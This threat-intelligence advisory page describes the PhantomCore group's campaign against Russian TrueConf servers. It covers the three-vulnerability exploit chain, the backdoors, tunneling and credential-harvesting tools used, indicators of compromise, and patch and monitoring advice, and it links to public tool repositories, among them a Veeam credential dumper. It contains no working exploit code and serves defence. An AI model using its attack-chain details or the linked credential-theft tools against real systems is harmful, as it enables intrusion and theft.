top of page
perceptive_background_267k.jpg

PhantomCore Exploits TrueConf Vulnerabilities to Breach Russian Networks

Published:

27 April 2026 at 11:54:00

Alert date:

27 April 2026 at 13:02:18

Source:

thehackernews.com

Click to open the original link from this advisory

Enterprise Applications, Ransomware & Malware, Zero-Day Vulnerabilities

Pro-Ukrainian hacktivist group PhantomCore has been actively targeting servers running TrueConf video conferencing software in Russia since September 2025. The threat actors are leveraging an exploit chain comprising three vulnerabilities to execute remote commands on susceptible systems. This campaign represents active exploitation of video conferencing infrastructure in a geopolitically sensitive context, with the attacks being attributed by Positive Technologies researchers.

Technical details

PhantomCore exploited a chain of three TrueConf Server vulnerabilities: insufficient access control allowing unauthenticated requests to admin endpoints, arbitrary file read capability, and command injection for executing arbitrary OS commands. The attack chain begins with compromising TrueConf servers, then uses them as springboards for lateral movement. Tools deployed include PHP-based web shells for remote command execution, PhantomPxPigeon backdoor disguised as legitimate TrueConf client, tunneling utilities (PhantomSscp, MacTunnelRat, PhantomProxyLite), reconnaissance tools (ADRecon), credential harvesting tools (DumpIt, MemProcFS, modified Veeam-Get-Creds), and SOCKS proxies (microsocks, rsocx, tsocks). The group creates rogue administrative accounts named 'TrueConf2' and maintains persistence through reverse SSH tunnels.

Mitigation steps:

Apply security patches released by TrueConf on August 27, 2025 to address the three vulnerabilities (BDU:2025-10114, BDU:2025-10115, BDU-2025-10116). Monitor for unauthorized administrative accounts named 'TrueConf2'. Implement network monitoring to detect unusual TrueConf server communications and lateral movement patterns. Watch for deployment of PHP web shells and reverse SSH tunnels. Monitor for reconnaissance activities using tools like ADRecon and credential harvesting attempts targeting Veeam backup systems. Implement endpoint detection for the mentioned malware families and maintain updated threat intelligence on PhantomCore TTPs.

Affected products:

TrueConf Server
TrueConf video conferencing software
Veeam Backup & Replication software

Related links:

https://ptsecurity.com/research/pt-esc-threat-intelligence/hiding-in-plain-sight-how-phantomcore-masks-its-activity-with-legitimate-tools/
https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/
https://thehackernews.com/2025/03/kaspersky-links-head-mare-to-twelve.html
https://thehackernews.com/2025/12/phantom-stealer-spread-by-iso-phishing.html
https://t.me/Positive_Technologies/3779
https://ptsecurity.com/research/trending-vulnerabilities/BDU-2025-10114/
https://ptsecurity.com/research/trending-vulnerabilities/BDU-2025-10115/
https://ptsecurity.com/research/trending-vulnerabilities/BDU-2025-10116/
https://habr.com/ru/companies/pt/articles/947166/
https://securelist.ru/head-mare-campaign-phantompxpigeon-backdoor-and-trueconf-software/114998/
https://github.com/sadshade/veeam-creds/blob/main/Veeam-Get-Creds.ps1
https://rt-solar.ru/solar-4rays/blog/4559/
https://github.com/rofl0r/microsocks
https://github.com/b23r0/rsocx/
https://github.com/jun7th/tsocks/blob/master/tsocks.py
https://habr.com/ru/companies/F6/articles/966072/
https://thehackernews.com/2025/08/clickfix-malware-campaign-exploits.html
https://thehackernews.com/2025/07/asyncrats-open-source-code-sparks-surge.html
https://thehackernews.com/2025/07/hackers-use-leaked-shellter-tool.html
https://ptsecurity.com/research/pt-esc-threat-intelligence/an-alarm-you-can-t-ignore-how-capfix-attacks-russian-organizations/
https://securelist.ru/tr/geo-likho-hits-russian-aviation/115306/
https://ptsecurity.com/research/pt-esc-threat-intelligence/mythic-likho-cyberattacks-on-russian-critical-information-infrastructure/
https://securelist.ru/merlin-loki-mythic-attacks/111704/
https://github.com/MythicAgents/merlin
https://securelist.ru/loki-agent-for-mythic/110361/
https://thehackernews.com/2023/02/threat-actors-adopt-havoc-framework-for.html
https://thehackernews.com/2026/02/bloody-wolf-targets-uzbekistan-russia.html
https://thehackernews.com/2026/01/multi-stage-phishing-campaign-targets.html
https://habr.com/ru/companies/pt/articles/1001196/
https://bi.zone/eng/expertise/blog/triedinoe-zlo-oborotni-atakuyut-sotrudnikov-silovykh-struktur/

Related CVE's:

Related threat actors:

IOC's:

TrueConf2 (rogue user account), PhantomPxPigeon backdoor, PhantomSscp DLL, MacTunnelRat PowerShell script, PhantomProxyLite PowerShell script, CapDoor backdoor, EchoGather trojan, SoullessRAT, AquilaRAT, stardebug[.]app (fake website), alphafly-drones[.]com (fake website)

This article was created with the assistance of AI technology by Perceptive.

About us

© 2025 by Perceptive Security. All rights reserved.

email: info@perceptivesecurity.com

Disclaimer: Deze website toont informatie afkomstig van externe bronnen. Perceptive aanvaardt geen verantwoordelijkheid voor de inhoud, juistheid of volledigheid van deze informatie.

bottom of page